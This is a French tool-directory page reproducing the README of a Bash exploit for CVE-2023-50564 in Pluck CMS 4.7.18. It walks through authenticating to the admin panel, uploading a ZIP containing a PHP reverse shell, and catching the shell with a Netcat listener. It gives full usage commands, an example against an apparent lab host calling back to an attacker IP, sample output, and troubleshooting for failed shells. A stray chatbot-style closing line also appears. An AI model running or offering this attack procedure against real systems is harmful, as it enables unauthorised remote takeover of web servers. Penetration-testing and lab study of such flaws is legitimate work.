Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHub0xdtc/pluck-cms-v4.7.18-remote-code-execution-cve-2023-50564

Pluck-CMS-v4.7.18-Remote-Code-Execution-CVE-2023-50564

Exploit Bash automatisant l'exécution de code à distance authentifiée dans Pluck CMS 4.7.18 via un téléchargement de ZIP malveillant, déclenchant un shell inverse PHP pour CVE-2023-50564.

Voir le dépôt
13il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50564 - Exploitation d'exécution de code à distance (RCE) dans Pluck CMS v4.7.18

Description

Ce script exploite une vulnérabilité d'exécution de code à distance (RCE) dans Pluck CMS v4.7.18. La vulnérabilité permet à un utilisateur malveillant de télécharger un fichier PHP malveillant sur le serveur et de l'exécuter, obtenant ainsi une exécution de commandes à distance sur la machine cible.

Le script automatise l'ensemble du processus en :

  1. S'authentifier sur le panneau d'administration de Pluck CMS à l'aide des identifiants fournis.
  2. Télécharger un fichier ZIP contenant un script PHP de reverse shell malveillant.
  3. Exécuter le reverse shell PHP, donnant à l'attaquant un accès distant à la machine cible.

Remarque : Le script nécessite un écouteur Netcat sur la machine de l'attaquant pour recevoir le reverse shell.


Prérequis

Avant d'exécuter le script, assurez-vous des points suivants :

  • Netcat est installé et un écouteur est configuré pour recevoir le reverse shell.
  • Vous disposez des bonnes valeurs pour l'hôte cible, le mot de passe, l'adresse IP et le port du reverse shell.
  • Vous avez accès au panneau d'administration de Pluck CMS sur la cible.

  • Utilisation

    root@kitploit:~
    ./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
    

    Arguments :

    • -h <host> : L'hôte cible (ex. greenhorn.htb).
    • -P <password> : Le mot de passe du panneau d'administration de Pluck CMS (ex. abcd123).
    • -i <IP> : L'adresse IP de l'attaquant pour recevoir le reverse shell.
    • -p <port> : Le port sur lequel l'écouteur Netcat écoute pour capturer le reverse shell.

    Exemple :

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    

    Étapes :

    1. Configurer l'écouteur Netcat : Sur la machine de l'attaquant, démarrez un écouteur Netcat sur le port spécifié :

      root@kitploit:~
      nc -nvlp <port>
      

      Par exemple :

      root@kitploit:~
      nc -nvlp 9001
      
    2. Exécuter le script : Fournissez les paramètres requis au script, y compris l'hôte, le mot de passe, l'adresse IP et le port.

      root@kitploit:~
      ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
      
    3. Exécution du script :

      • Le script se connecte au panneau d'administration de Pluck CMS.
      • Il télécharge un fichier ZIP contenant un script PHP de reverse shell (love.php).
      • Une fois le fichier ZIP téléchargé, le reverse shell est exécuté sur la cible, et une connexion est établie avec votre écouteur Netcat.
      • Un message clair s'affiche : "RCE is waiting for you, please go take a look.", et le script se termine après avoir suivi le temps écoulé.
    4. Accéder à la cible : Une fois le reverse shell déclenché, la connexion apparaîtra dans votre écouteur Netcat, vous donnant un accès distant à la machine cible.


    POC

    image


    Exemple de sortie

    root@kitploit:~
    ./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
    Netcat listener detected on port 9001.
    Downloading reverse shell PHP exploit...
    updating: love.php (deflated 60%)
    Exploit zipped as loverce.zip and original PHP file removed.
    Extracted Cookie: PHPSESSID=somecookievalue
    Login successful!
    ZIP file uploaded successfully.
    RCE is waiting for you, please go take a look.
    Script terminated. Total time taken: 70 seconds.
    

    Prérequis

    • cURL : Pour interagir avec Pluck CMS et télécharger des fichiers.
    • Netcat : Pour écouter le reverse shell.

    Vous pouvez installer curl et netcat en utilisant les commandes suivantes s'ils ne sont pas installés :

    Debian/Ubuntu :

    root@kitploit:~
    sudo apt update
    sudo apt install curl netcat
    

    Red Hat/CentOS/Fedora :

    root@kitploit:~
    sudo yum install curl nc
    

    Avertissement

    Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Toute utilisation non autorisée de ce script est illégale et contraire à l'éthique. Obtenez toujours une autorisation appropriée avant d'exploiter une vulnérabilité sur un système.


    Dépannage

    1. 504 Gateway Time-out : Le script peut rencontrer cette erreur lors de la tentative d'exécution du reverse shell, mais cela n'affecte pas la réussite de l'exécution du shell. L'erreur est généralement due au fait que le serveur cible met trop de temps à répondre à la requête HTTP, mais le shell devrait tout de même fonctionner.
    2. Problèmes d'écouteur Netcat : Si vous ne recevez pas le reverse shell, assurez-vous que votre adresse IP et votre port sont correctement définis, et qu'il n'y a pas de restrictions de pare-feu empêchant la cible de se connecter à votre machine.
    3. Échec de connexion du script : Si la connexion au panneau d'administration du CMS échoue, vérifiez le mot de passe fourni et assurez-vous que le CMS est accessible sur la machine cible.

    Faites-moi savoir si vous souhaitez toute autre personnalisation ou clarification dans le README !

    Télécharger l’outil